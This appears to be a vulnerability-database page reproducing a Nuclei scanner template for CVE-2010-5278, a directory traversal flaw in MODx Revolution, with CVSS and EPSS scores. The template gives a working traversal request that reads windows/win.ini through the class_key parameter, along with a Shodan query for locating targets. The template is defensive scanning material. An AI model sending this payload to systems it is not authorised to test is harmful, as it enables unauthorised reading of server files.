Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-5278
HistoryAug 14, 2021 - 1:36 a.m.

MODx manager - Local File Inclusion

2021-08-1401:36:29
ProjectDiscovery
github.com
45
cve
lfi
modx
exploit-db
packetstorm
vulnerability

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

AI Score

6.6

Confidence

Low

EPSS

0.044

Percentile

92.5%

A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a … (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.

id: CVE-2010-5278

info:
  name: MODx manager - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: |
    Apply the latest patches and updates provided by MODx to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/34788
    - https://nvd.nist.gov/vuln/detail/CVE-2010-5278
    - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt
    - http://modxcms.com/forums/index.php/topic,55104.0.html
    - http://modxcms.com/forums/index.php/topic,55105.msg317273.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2010-5278
    cwe-id: CWE-22
    epss-score: 0.06135
    epss-percentile: 0.93535
    cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: modx
    product: modx_revolution
    shodan-query: cpe:"cpe:2.3:a:modx:modx_revolution"
  tags: cve,cve2010,lfi,edb,packetstorm,modx

http:
  - method: GET
    path:
      - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b69cc6b4c42025b13e1bc52d65ea1be1df0981a7add3a28408c4dc8ac8c1bb46022100dc24a3d37f2cc1e1d2ff28b81ed9bd7551744367bd64dfe547edce7f6af21976:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

AI Score

6.6

Confidence

Low

EPSS

0.044

Percentile

92.5%

Related for NUCLEI:CVE-2010-5278